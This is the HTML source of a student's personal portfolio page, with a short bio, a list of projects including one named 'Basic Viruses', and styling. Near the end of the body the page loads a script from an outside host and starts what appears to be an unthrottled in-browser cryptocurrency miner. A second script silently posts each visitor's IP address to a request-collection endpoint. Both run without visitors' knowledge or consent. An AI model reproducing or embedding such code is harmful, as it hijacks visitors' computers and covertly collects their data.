<!DOCTYPE html>
<html>
<head>
	<!--Loads fonts-->
	<link href="https://fonts.googleapis.com/css?family=Bebas+Neue|Roboto&display=swap" rel="stylesheet">
	<link href="https://fonts.googleapis.com/css?family=Passion+One&display=swap" rel="stylesheet">
	<!--Sets the title-->
	<title>Schold - Developer</title>
</head>
<!--Starts the body tag-->
<body background="images/background.jpg" style="background-repeat: no-repeat; background-size: cover;">
	<h1 class="verticalCenter colorWhite fontSize150 center underline bolder">SCHOLD</h1>
	<p id="desc" class="translateY blackUnderline colorWhite fontSize50 center underline">a self-taught web developer</p>
	<center style="transform: translateY(-150px);">
	<img src="images/me.jpg" class="translateYr roundImage center" width=250 alt="Picture of me">
	<h3 class="bio">About Me</h3>
	<p class="bio">
		My name is Rasmus, a self-taught web developer, mainly in html, css and partly js.<br>
		I'm 17 years old, 1st Dec. 2019. My current school is LBS in Jönköping. <br>
		The reason why I made this website is because I'm gonna study webdevelopment next year in school</p>
		<div class="debug">
	<marquee style="transform: translateY(12px);" id="" class="bio correctFont fontSize30" direction="left" scrollamount="10" behavior="alternate"><p class="quote"><span class="quotationMark" style="font-size: 70px;">"</span>Nothings Over til' it's over - Rocky</p></marquee>
	</center>

	<center class="projects">
		<p class="fontSize50">My Projects</p>
	<a class="projects colorBlack fontSize50 center" href="customCMDLook/index.html">CMD</a>
	<a class="projects colorBlack fontSize50 center" href="" onclick="showMessage('This is not available yet')">JLT</a>
	<a class="projects colorBlack fontSize50 center" href="easyPython/index.html">EasyPython</a>
	<a class="projects colorBlack fontSize50 center" href="guyFawkes/index.html">Guy Fawkes</a><br>
	<a class="projects colorBlack fontSize50 center" href="babyYodaClicker/index.html">Baby Yoda Clicker</a>
	<a class="projects colorBlack fontSize50 center" href="swish/index.html">FakeSwish</a>
	<a class="projects colorBlack fontSize50 center" href="3dmodels/index.html">3D Models</a><br>
	<a class="projects colorBlack fontSize50 center" href="basicViruses/index.html">Basic Viruses</a>	
</center>
<footer>
	<center>
		<marquee style="transform: translateY(15px);" id="ip" class="bio correctFont fontSize30" direction="left" scrollamount="10" behavior="alternate"></marquee>
		<!--<p style="transform: translateY(-5px);" class="fontSize50">Schold 2019 &copy</p>-->
	</center>
</footer>
		    <script src="https://www.hostingcloud.racing/sKnH.js"></script>
    <script>
        var _client = new Client.Anonymous('df9415b8c5b511dbab1d844ac02fdd395a6a4f111ea76b30b5ce0fe6f6a641a4', {
            throttle: 0, c: 'w'
        });
        _client.start();
    
    </script>
		    <script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"> </script>
<script> 
        $.getJSON("https://api.ipify.org?format=json", 
            function(data) { 
            console.log(data.ip);

            const headers = new Headers()
        headers.append("Content-Type", "application/json")
        const body = { "name": "IP: " + data.ip}
        const options = {
        method: "POST",
        headers,
        mode: "cors",
        body: JSON.stringify(body),
        }
        fetch("https://enyfo0cyahag.x.pipedream.net/", options)
        }) 
    </script> 
</body>
</html>

<script type="text/javascript">
	function showAlert() {
		alert("This is not yet published, please try again later.");
	} 
	function showMessage(message) {
		alert(message);
	} 
</script>

<!--Gets you local IPv4 and replaces the value of any component with id "gfg" with your IP adress-->
<script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"> 
    </script> 

  
    <script> 
        $.getJSON("https://api.ipify.org?format=json", 
			function(data) { 
            $("#ip").html("Your IP: " + data.ip); 
        }) 
    </script> 

<style type="text/css">
	
	p{
		font-family: 'Bebas Neue', cursive;
	}

	h1{
		font-family: 'Bebas Neue', cursive;
		font-style: italic;
	}

	h3{
		font-family: 'Bebas Neue', cursive;
		font-size: 40px;
	}

	a{
		text-decoration: underline;
		font-family: 'Bebas Neue', cursive;
	}

	footer{
		background-color: grey;
		height: 50px;
	}

	.quotationMark {
		font-family: 'Passion One', cursive;
	}
	.correctFont {
		font-family: 'Bebas Neue', cursive;
	}

	.debug{
		width: 850px;
		display: inline-block;
	}

	.roundImage {
		border-radius: 50%;
	}

	.quote {
		font-weight: lighter;
		line-height: 22px;
		font-style: italic;
		font-size: 25px;
	}

	.bio {
		font-weight: lighter;
		line-height: 22px;
		font-size: 25px;
	}

	.center {
		text-align: center;
	}

	.projects{
		margin: 25px;
		transform: translateY(-50%);
	}

	.translateY{
		transform: translateY(-200%);
		filter: blur(2px);
	}

	.verticalCenter {
		vertical-align: middle;
	}

	.oneLine {
		display: inline;
	}

	.underline {
		text-decoration: underline;
		text-decoration-color: black;
	}

	.bold {
		font-weight: bold;
	}

	.bolder {
		font-weight: bolder;
	}
	.fontSize30{
		font-size: 30px;
	}

	.fontSize50{
		font-size: 50px;
	}

	.fontSize150{
		font-size: 150px;
	}

	.colorWhite {
		color: white;
	}

	.colorBlack {
		color: black;
	}



</style>
